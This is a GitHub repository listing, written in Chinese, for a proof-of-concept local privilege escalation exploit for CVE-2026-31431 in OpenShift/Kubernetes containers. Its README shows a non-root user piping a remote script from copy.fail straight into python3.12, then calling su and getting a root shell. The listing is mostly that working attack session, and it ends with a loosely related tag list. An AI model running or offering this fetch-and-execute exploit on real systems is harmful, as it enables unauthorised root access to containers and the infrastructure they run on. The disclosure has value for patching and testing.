gmeghnag/TEST-CVE-2026-31431
GitHub: gmeghnag/TEST-CVE-2026-31431
针对 CVE-2026-31431 的本地提权漏洞概念验证,演示在 OpenShift/Kubernetes 容器内从非特权用户提权至 root 的完整过程。
Stars: 0 | Forks: 1
# TEST-CVE-2026-31431
```
# oc new-app -n default https://github.com/gmeghnag/TEST-CVE-2026-31431
# oc rsh -n default deployment/test-cve-2026-31431
sh-5.1$ id
uid=1001(1001) gid=0(root) groups=0(root)
sh-5.1$ curl -s https://copy.fail/exp | python3.12 && su
[root@test-cve-2026-31431-78f6d9cc97-n7d5j /]# id
uid=0(root) gid=0(root) groups=0(root)
```
标签:CSV导出, CVE-2026-31431, Exploit, Maven, OpenShift, PoC, Red Hat, Root提权, Web截图, 协议分析, 子域名突变, 安全漏洞, 容器安全, 容器逃逸, 提权漏洞, 暴力破解, 权限提升, 漏洞验证